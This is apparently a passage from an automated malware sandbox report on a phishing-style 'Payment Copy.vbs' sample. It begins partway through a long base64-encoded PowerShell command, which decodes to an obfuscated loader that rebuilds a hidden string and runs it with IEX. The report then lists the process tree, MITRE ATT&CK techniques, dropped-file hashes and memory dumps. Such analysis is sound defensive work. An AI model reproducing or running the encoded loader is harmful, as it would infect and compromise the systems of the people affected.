wAdABlAHkAVwBlAGkAZwBoAHMAcgBlAGoAZQBtAHQAQgBsAG8AbQBzAGUAaQBuAHYAYQBsAG0AUwBsAG8AdgBhAEwAVQBuAGQAZQByAG8ARgByAGkAbQAgAGMAVABhAGwAaQBzAGEAVQBkAHMAdABlAGwAUABsAGEAdABvAGUAUwBhAG0AYQByAHMAVABlAHIAcgBhAEEARwB5AHIAbwBjACgAaAB1AGwAawBvAHUAQgBsAG8AawByAGkAdAByAGEAZgBpAG4AdAByAGkAZAAgAHQAVABhAHUAdABvACAAQQBtAG4AaQBvAHYAZgBvAHIAdgBhADEARABpAGMAawBlACwASABvAHAAcABlAGkAUwBjAGkAdQByAG4ATQBhAHQAYQBkAHQATgBvAG4AaABhACAAUgBhAGcAbwB1AHYATABlAG4AcwBoADIAQQBlAHEAdQBvACkAQQB0AGwAZQAgADsACgBNAGEAcwBrAGkAWwBSAGcAcwBrAHkARAB1AGkAZwBlAG4AbABMAGEAYwB0AGkAbABoAHkAZAByAG8ASQBEAGUAbQBvAG4AbQBUAGkAbQBvAG4AcABGAGwAZQByAGYAbwBNAGUAbABlAGEAcgBTAGsAaQBkAGUAdABBAG4AdABpAGYAKABBAHUAdABvAG4AIgBpAG4AcwBlAG0AawBTAHkAbgB0AGUAZQBVAG4AaQBuAGQAcgBOAGkAZwByAGUAbgBkAHcAYQByAGYAZQBVAG4AcAB1AHIAbABLAGUAbgBkAGkAMwBFAG4AZABvAHMAMgBLAHIAaQBnAHMAIgBEAGUAZwBhAHUAKQBEAGEAbQBwAGUAXQBGAG8AbABkAGUAcABHAGUAbgBmAHIAdQBLAG8AbwByAGQAYgBVAGwAaQB2AHMAbABFAHMAcAByAGUAaQBNAGkAcwB3AGkAYwBFAG0AZQBsAGUAIABJAG4AZgBhAHIAcwBmAGUAbgBjAGUAdABCAGkAbgBvAG0AYQBDAGgAaQBmAGYAdABCAGUAcgByAGUAaQBQAHIAZQBzAHkAYwBGAHIAaQB0AHUAIABTAHAAaQBvAG4AZQBTAG4AdQByAHIAeABSAHUAaQBuAGEAdABMAGkAdgBzAGIAZQBUAGEAbgBrAGUAcgBCAGEAYwBrAHUAbgByAGUAcABhAHIAIABIAGkAcgBhAGsAaQBDAG8AbQBwAHIAbgBSAGUAbgBkAHMAdABUAGkAbABnAG8AIABSAGUAcwBwAGUAVgBSAGUAdgBvAGwAaQBQAG8AdABjAGgAcgBWAGkAZABuAGUAdABKAG8AaABhAG4AdQBCAHIAYQBzAGUAYQBBAGYAaAByAGUAbABFAG4AYwBlAHAAQQBDAGEAbgBvAHIAbABDAGEAcgBkAGkAbABCAGEAbABzAGEAbwBTAGgAdQBjAGsAYwBPAHMAcABoAHIAKABSAGEAawBlAGgAaQBDAGgAbwB3AGUAbgBDAHQAZwAgAE0AdABHAGUAbwBwAG8AIABWAGUAeABpAGwAdgBDAGEAbgBjAGUAMQBDAGwAaQBuAGkALABSAHUAYgBpAGMAaQBCAGEAYwBjAHkAbgBCAGUAZQBkAGkAdABPAHYAZQByAHIAIABvAHUAdAByAG8AdgBOAG8AbgBkAGUAMgBUAHIAaQBjAG8ALABGAHIAYQBmAGwAaQBEAHkAawBhAGcAbgBPAHIAZAByAGUAdABjAHIAeQBvAGcAIABBAGMAYwAgAFMAdgBTAHEAdQBpAHIAMwBJAG4AZABzAGsALABDAGkAcgBrAHUAaQBSAGUAdAByAG8AbgBBAGMAYwBlAGwAdABUAGgAaQBvAGMAIAB0AGkAbABzAHkAdgBNAG8AcgBkAHQANABFAGsAcwB0AGkAKQBJAG4AdABlAHIAOwAKAE4AeQBkAGUAbAB9AAoARQB1AGQAaQBhACIATAC8AHQAdABlAEAACgBFAG4AbABpAGcAJABQAGUAcgBpAHAASABGAG8AcgBkAG0AbwBPAHYAZQByAHMAbgBtAGwAawBlAGEAbgBoAHkAcABlAHIAaQBTAGsAcgBkAGQAbgBQAGgAbwB0AG8AZwBBAGwAdgBhAHIAbQBMAGUAdAB0AGkAMwBBAHUAdABvAGkAPQBVAGUAcgBzAHQAWwBVAG4AYwBpAHIASABQAHIAaQBzAG0AbwBDAG8AdABoAGUAbgBrAGUAYQB0ACAAbgBSAGQAYQByAHYAaQBKAG8AbAByAGUAbgBNAGEAbABtAGgAZwBKAGgAbwBvAGwAbQBTAGEAdQBjAGUAMQBUAG8AdAByAGkAXQBGAGoAZQByAG4AOgBSAGUAZAB1AGMAOgBUAG8AbAB2AHQAVgBUAG8AbgBlAGYAaQB3AGgAZQBpAG4AcgBJAG4AcwB0AGkAdABkAHUAbQBwAGUAdQBBAHYAZQBuAG8AYQB0AGkAdAB1AGwAbABEAGUAdABlAHIAQQBKAHUAdgBlAGwAbABzAHQAcgBpAHAAbABCAGkAbQBvAGQAbwBGAHIAaQBoAGEAYwBSAGUAdgBlAHIAKABPAHYAZQByAGoAMABIAHUAcwBoAG8ALABjAHUAbABvAHQAMQBhAGMAaABlAHMAMABUAGUAcgBtAGkANABNAG8AZABlAGwAOABTAGwAdQB0AHQANQBDAGEAYwBoAGUANwBLAGkAawBlACAANgBCAGUAdAByAGEALABTAHAAaQB2AHYAMQBCAHIAZQB2AHYAMgBKAG8AcgBkAGIAMgBIAHUAcwB0AGUAOABFAHAAaQBkAGUAOABTAGEAbgBkAHYALABNAGEAdQBuAGQANgBnAHkAbABkAGkANABTAHQAZQByAGkAKQAKAGEAbgB0AGkAawAkAEEAbABhAHIAbQBDAEEAZgBnAHIAZQBlAHMAbAAgAGUAcgByAGEAdQB0AG8AZgBpAEwAYQB0AHIAaQBhAEoAbwByAGQAYgBuAEcAZQB2AHIAawB0AFUAbgBzAGEAcABoAFUAZgBvAHIAawA9AE0AaQBzAHMAbwAoAFMAZQBuAHMAYQBHAGEAYgBjAGUAcwBlAGcAcgBuAHMAZQB0AFUAcgBzAHQAcgAtAEUAbQB1AGwAcwBJAEgAeQBkAGEAdAB0AEIAYQByAG4AYQBlAFMAbQBhAGcAcwBtAE4AbwBuAGkAbgBQAFYAYQBjAGMAaQByAEIAYQBhAGQAbQBvAFQAdQBzAHMAYQBwAEIAdQBtAG0AaQBlAG8AeABhAGwAaQByAFAAaAByAGEAdAB0AGwAaQB2AHMAbAB5AEgAdQBkAG8AcgAgAE8AbABpAGcAYQAtAE0AaQBuAGsAZQBQAFUAcgBiAGEAbgBhAFQAZQB0AHIAYQB0AFAAbABhAG4AbwBoAFQAbwBuAGUAcwAgAEMAaAByAGkAcwAiAEYAbAB1AG8AcgBIAHIAZQBhAGsAdABLAEQAaQB0AHQAbwBDAE0AYQBsAG0AcwBVAHEAdQBpAHYAZQA6AEUAdABlAHIAbgBcAFAAcgBvAHQAbwBTAEUAcwBwAHIAZQBvAFIAdQBtAG8AcgBmAFUAcgBvAGwAbwB0AGwAaQBsAGwAZQB3AFQAaABvAHIAbgBhAFMAdQBiAG0AZQByAEIAYQBsAGwAbwBlAFMAdABlAGQAZgBcAFAAYQBwAGkAcgBBAFUAbgB3AGUAYQBtAFIAZQBsAGkAZwBpAEMAbwBuAHMAcABuAFIAZQBrAGwAYQA2AEkAbQBwAGEAaQA3AEsAYQByAGQAYQAiAEQAbwBtAGkAbgApAEwAYQB0AGUAcgAuAFQAcgBlAHAAYQBPAEUAcABpAHQAYQBwAEsAbAB0AHIAaQBzAFMAawBpAGIAcwBhAFMAeQBsAHQAZQBtAE4AbwBuAGMAbwBsAEYAbwByAHMAawBpAEYAbAB1AHQAZQBuAAoAVABpAG4AZwBsACQAQQBuAGkAbQBhAEIARgBlAG4AbgBlAGkAVQByAGkAbgBvAGwATwByAGkAZwBhAGYAWQBwAHAAZQByAGEAVQBtAGIAaQBsAGIAUABlAHIAaQBzAHIASQBuAGQAYgByADEAUgBlAGMAYQBzADQARABpAHMAYwBvADQARgBqAG8AcgB0ACAAQQBuAG8AcgBlAD0ATgBvAG4AcwBhACAAVAByAGEAbgBzAFsARgB1AHIAbQBlAFMAVABlAGEAcgBnAHkAUwB1AGsAawBlAHMAQgB1AHIAbgBpAHQAQgBvAHIAdABmAGUAQQByAGsAdgBpAG0AUgBlAHYAaQBkAC4AUgBnAGUAcgBsAEMAVAByAGUAZQBoAG8AQwBvAG0AcAB1AG4ATABnAGUAYgBvAHYAVABpAGwAcwBrAGUAVgBlAGsAcwBlAHIAQQBiAHIAbwBuAHQATwBiAHMAawB1AF0ARABiAGUAcgAgADoAcABhAHIAbABlADoAQgBlAGQAcgBhAEYASABlAHIAcwBrAHIAUwB0AGEAcgBnAG8AVQBkAHMAdABlAG0AUwBlAGcAcgBlAEIAUwB1AGIAZABlAGEAQgBpAHMAcABlAHMAYQBuAHAAcgBpAGUATQBlAGkAYgBvADYAQQBuAGEAcABhADQASQBsAGwAdQBjAFMARgBvAHIAaABhAHQAQwBhAHAAcgBpAHIAQQByAGQAdQBvAGkATQBhAG4AbwBtAG4AQwB1AG4AbgBpAGcASABhAG4AawBlACgASwBsAGcAbABhACQAUwBlAGQAaQBtAEMAVQBuAGQAZQBjAGUARQBuAGQAbwBzAHIARABlAHIAdgBpAGkAQwBvAHUAbgBjAGEAUwB3AGEAdAB0AG4ARgBvAHIAdAByAHQAQgBvAGcAcwBrAGgASABlAGMAYQB0ACkACgBWAGkAcgBrAGUAWwBPAHAAdABhAGcAUwBQAGkAbgBjAGgAeQBGAGUAcgB0AGkAcwBQAGUAZABhAG4AdABVAG4AdABlAGEAZQByAGQAawBhAGEAbQBJAG4AZABkAHIALgBBAHIAcgBpAHYAUgBTAHQAaQB2AGIAdQBGAG8AcgBuAHUAbgBBAGMAdABnACAAdABBAHQAYQB4AG8AaQBCAG8AcgBnAGUAbQBCAG8AdABoAHIAZQBSAG8AZQBqAG8ALgBUAG8AcABsAGEASQBSAGkAcwBvAHQAbgBOAGUAcgBlAGkAdABNAGkAZABkAGwAZQBCAG8AbABkAGYAcgBYAGUAcgBvAHAAbwBTAHAAaQBkAHMAcABwAHUAcwB0AHUAUwBUAGEAbABlAG4AZQBTAGUAeABzAHkAcgBNAGkAcgBhAGMAdgBwAG8AbABhAHIAaQBIAGoAbABwAGUAYwBJAG0AcAByAGUAZQBTAGsAcgB2AGUAcwBGAGkAbgBlAHIALgBWAGkAcgBrAGUATQBSAGEAYwBoAGkAYQBEAHkAawBuAGkAcgBkAGkAcwBpAG4AcwBTAGwAagBmAGUAaABNAGUAcgBvAGgAYQBTAGkAawBrAGEAbABBAHkAYQBwAGEAXQBCAG8AawBzAGUAOgBGAG8AcgBtAGkAOgBTAGEAbQBtAGUAQwBQAHUAcgBjAGgAbwBOAGEAagBhAGQAcABLAGwAYQBtAG0AeQBQAHIAdQBzAHQAKABNAHUAcwBlAHMAJABCAGkAdAB0AGUAQgBSAGUAcwBvAG4AaQBCAGUAcgBnAHMAbABTAGsAaQBuAGsAZgBVAGQAdgBpAGsAYQBTAHkAcwB0AGUAYgBHAGUAbgBpAHQAcgBoAGEAbgBkAGkAMQBTAHkAcgBpAG4ANABIAGUAbABpAG8ANABQAGEAcgBhAGwALABzAHQAcgBhAG4AIABEAGUAcgBtAGkAMABUAGUAcgBjAGUALABNAG8AcgBzAGUAIABwAHIAZQBwAHkAIABLAHQAdABlAHIAJABLAGEAYgBlAGwASABDAGgAaQBsAGQAbwBSAGUAZwBuAHMAbgBDAGUAbgB0AHIAbgBVAGwAbABtAGEAaQBNAHUAcwBrAGUAbgBJAG4AYwBpAHMAZwBPAG0AZwBhAG4AbQBTAGgAZQBpAHQAMwBFAHMAYwBvAHUALABsAG8AdgBvAHYAIABSAGUAYwBsAGkAJABJAG4AdABlAHIAQgBGAGwAYQBzAGgAaQBVAG4AZABlAHIAbABHAGEAcwB3AG8AZgBXAGkAdABoAGgAYQBBAG4AYQByAGMAYgBEAGUAbgBvAHQAcgBwAGEAcgB0AGkAMQBCAGUAZwByAGEANABQAGUAcgBpAGsANABQAGwAbwB3AGIALgBGAG8AcgBiAGkAYwBIAGEAdgBrAGEAbwBTAHQAYQBsAGEAdQBCAGEAeQBpAG4AbgBtAGEAbABhAHAAdABGAHIAZQBtAGcAKQBUAHkAcgBlAG4AOwAKAEIAYQBuAHQAZQBbAE8AdgBlAHIAZgBIAEIAagBlAHIAZwBvAFAAYQBpAGQAbwBuAEwAaQBtAGEAYwBuAFQAbwBwAGYAbwBpAFQAcgBhAGcAdABuAEEAcgBjAGgAYQBnAEcAZQBvAGwAbwBtAEYAaQBsAG0AbwAxAEYAZQBkAHQAYwBdAEsAYQByAHIAZQA6AEsAbwBtAG0AdQA6AGQAZQByAGEAbgBFAFAAZQByAGkAZgBuAFQAbwBsAGUAcgB1AFQAegBhAHIAZQBtAFcAYQB1AHIAIABTAFQAcgBhAGsAdAB5AFMAaABtAGEAbABzAE4AeQBiAHIAdQB0AFMAdABvAGMAawBlAE4AYQByAGsAbwBtAFIAZQBpAHQAYgBMAFMAYwB1AGwAbABvAEgAZQBuAHMAeQBjAEwAbwBvAHMAZQBhAEIAbABzAGUAcgBsAHMAaQB0AHIAZQBlAEgAeQBhAGwAaQBzAFMAbwBjAGkAYQBBAEYAbwByAHMAZQAoAEIAZQBrAGkAcwAkAFMAbwBhAHAAbABIAEYAYQB1AG4AYQBvAFIAZQBuAHMAbgBuAEUAcABpAHQAZQBuAE8AcABoAG8AbABpAEMAbwBuAHQAcgBuAEUAbQBiAG8AcgBnAFMAYwBoAGwAbwBtAFUAZABmAHIAZQAzAFAAYQBuAHQAbwAsAFUAbgBpAG0AbQAgAEYAbwByAHUAbgAwAEEAZAB2AGUAcgApAFQAYQBzAHMAZQAjAAoAJwBAAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0ANQA7ACAAJABpACAALQBsAHQAIAAkAFQAdQBuAGUAbgBlAGQAZQBtAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQARABvAGwAbwBtACAAPQAgACQARABvAGwAbwBtACAAKwAgACQAVAB1AG4AZQBuAGUAZABlAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABUAHUAbgBlAG4AZQBkAGUAbQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABEAG8AbABvAG0AIAA9ACAAJABEAG8AbABvAG0AIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABEAG8AbABvAG0ADQAKAA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5w1suozh\5w1suozh.cmdline"
      4⤵
      PID:5432
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F30.tmp" "c:\Users\Admin\AppData\Local\Temp\5w1suozh\CSC663AF21EB6034E399E31C34BC8FCE22.TMP"
        5⤵
        
        PID:5476

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5w1suozh\5w1suozh.dll

Filesize
3KB

MD5
07691d5554b019e4e4a675828435a978

SHA1
9c316995d509aeface95af5dd6a3a9ce22177df7

SHA256
93d620fe5e0de27de98fa5f814af0d954fdfe9227deaa4a222fc95ed53b984da

SHA512
8b0bc3c5fcf563723326c893e1aa5991486452868d7215a06b196c9d1e0bc99094e53a9f003df552d3a29780526c0b7df02d698469ea87cb5b73ea9eca51641c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOC6791E57\Payment Copy.vbs

Filesize
290KB

MD5
e4665b563ffdc96f94d81932c3832251

SHA1
fb6f60523eb33701d88c3560c84898cc897204b3

SHA256
dae203e91ee5441114c24bd6101c4e3925a8118a76c44be538dbcd28a6aeee0e

SHA512
6595db6ed4808720bf1a3218362ee881d9feeb4dfbf3c8a43c7fc954293cbb38ba8937a5e3fc7495cc523f731400f037c1a32f526f3cca444eaacaa626e19482

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1F30.tmp

Filesize
1KB

MD5
6b7aa8528de023d7ffeb7b8cabfcd788

SHA1
ff57476f8a0fee666fb92c92ce03cf1b1d2f566b

SHA256
ccc4fb7cb72736eccfda00dbf3c86060a3967835a8ad50f5625eb3b641cec83d

SHA512
a0904fee3212039ea7db4929c077dcc5b336717a32c858c0fc91bf197bf8c3ca2aacad73f26f44b0a61e141001deaf9a1ee44ea17f043f0b55b544d7df03fc19

Download Submit
C:\Users\Admin\Downloads\Payment Copy.7z

Filesize
142KB

MD5
7d04caa6df00e34b75a79693efe7b919

SHA1
41f8f522175c0fd4f66283e7eb11b91aab8b81fa

SHA256
934ffa29ec242b6bdb012928a217c8187d32b1889901d2ca1b1125e7af1001dd

SHA512
e906635b39784bed78d4f066095c9d9887ded934ca0e2e7291de8ac11254d2b6f52129ce95e1b53c4c3a7ed72d34902bdfc4de89523d122cd859a03ac81fcfd7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5w1suozh\5w1suozh.0.cs

Filesize
884B

MD5
04a75831628af9d016dbc97c99f2f327

SHA1
ec240bbcf3016bd223b3102af156eec418f5e0f8

SHA256
35276d736b51bd97c0739d209147866ada76598e0c96fc181d4555f0f149d292

SHA512
52bf2dc90eb4b3ef89bf17aec7954246b3705368f7e6c5ad643eee7f7a34e7f4b7f48ec08fac3715d459d3f1871e3a2f23d2a2a89c6a879b21a1c1913d61a3f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5w1suozh\5w1suozh.cmdline

Filesize
369B

MD5
2b4692801375ef83ec3ae3dd3e111362

SHA1
c8ab708d0ade57f30a9eb71527afc748fe083824

SHA256
d31e856d7cff420f07ad2cb108bf2b4879d31905f40637a61cab3fae0aaf59af

SHA512
3fc7da09f515bba03ef0e4412eb4c8b6534e413dd48abd1f8c3900dfe3a17d19a096a2d148cf6ff33f81284fe1e8037a193644299d74dc56d3fa5a3d691875c8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5w1suozh\CSC663AF21EB6034E399E31C34BC8FCE22.TMP

Filesize
652B

MD5
14789f2dad93c675f2ada8f168995e31

SHA1
92f5ecf44ca6b676d7e667a7643ed33947ddfac9

SHA256
605f681a7b5b39f0698feecce69961400231a23f9f96fb53f41b5901cef27b86

SHA512
9c1e14dba23397d528ddda64d14cb2aa1c5f0be47a654eab61e3cec78508f33711eb75d0e2686aa039b9da7b5ef5fb0bea5dcbfafa1899b52baeb5ec4401855f

Download Submit
\??\pipe\LOCAL\crashpad_540_TIHWQTTDXXFFWYBG

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/540-132-0x0000000000000000-mapping.dmp

Download
memory/1228-144-0x0000000000000000-mapping.dmp

Download
memory/1312-159-0x0000000000000000-mapping.dmp

Download
memory/1420-156-0x0000000000000000-mapping.dmp

Download
memory/1456-172-0x0000000000000000-mapping.dmp

Download
memory/1576-168-0x0000000000000000-mapping.dmp

Download
memory/2352-155-0x0000000000000000-mapping.dmp

Download
memory/2396-178-0x0000000000000000-mapping.dmp

Download
memory/2916-164-0x0000000000000000-mapping.dmp

Download
memory/3000-210-0x0000000000000000-mapping.dmp

Download
memory/3004-166-0x0000000000000000-mapping.dmp

Download
memory/3112-139-0x0000000000000000-mapping.dmp

Download
memory/3136-152-0x0000000000000000-mapping.dmp

Download
memory/3136-179-0x0000000000000000-mapping.dmp

Download
memory/3376-213-0x0000000000000000-mapping.dmp

Download
memory/3732-174-0x0000000000000000-mapping.dmp

Download
memory/3876-133-0x0000000000000000-mapping.dmp

Download
memory/4160-134-0x0000000000000000-mapping.dmp

Download
memory/4228-212-0x0000000000000000-mapping.dmp

Download
memory/4256-176-0x0000000000000000-mapping.dmp

Download
memory/4404-147-0x0000000000000000-mapping.dmp

Download
memory/4528-136-0x0000000000000000-mapping.dmp

Download
memory/4552-180-0x0000000000000000-mapping.dmp

Download
memory/4716-161-0x0000000000000000-mapping.dmp

Download
memory/4860-181-0x0000000000000000-mapping.dmp

Download
memory/4888-170-0x0000000000000000-mapping.dmp

Download
memory/4948-208-0x0000000000000000-mapping.dmp

Download
memory/5328-182-0x0000000000000000-mapping.dmp

Download
memory/5432-195-0x0000000000000000-mapping.dmp

Download
memory/5476-198-0x0000000000000000-mapping.dmp

Download
memory/5832-215-0x0000000000000000-mapping.dmp

Download
memory/6048-184-0x0000000000000000-mapping.dmp

Download
memory/6112-190-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/6112-205-0x0000000006DC0000-0x0000000006EC0000-memory.dmp

Filesize
1024KB

Download
memory/6112-192-0x0000000005C20000-0x0000000005C3E000-memory.dmp

Filesize
120KB

Download
memory/6112-186-0x0000000000000000-mapping.dmp

Download
memory/6112-202-0x0000000006FE0000-0x0000000007076000-memory.dmp

Filesize
600KB

Download
memory/6112-203-0x0000000006EC0000-0x0000000006EE2000-memory.dmp

Filesize
136KB

Download
memory/6112-204-0x00000000081B0000-0x0000000008754000-memory.dmp

Filesize
5.6MB

Download
memory/6112-189-0x0000000005480000-0x00000000054A2000-memory.dmp

Filesize
136KB

Download
memory/6112-206-0x0000000006DC0000-0x0000000006EC0000-memory.dmp

Filesize
1024KB

Download
memory/6112-191-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/6112-194-0x0000000006D30000-0x0000000006D4A000-memory.dmp

Filesize
104KB

Download
memory/6112-187-0x0000000002750000-0x0000000002786000-memory.dmp

Filesize
216KB

Download
memory/6112-188-0x0000000004DE0000-0x0000000005408000-memory.dmp

Filesize
6.2MB

Download
memory/6112-193-0x0000000007580000-0x0000000007BFA000-memory.dmp

Filesize
6.5MB

Download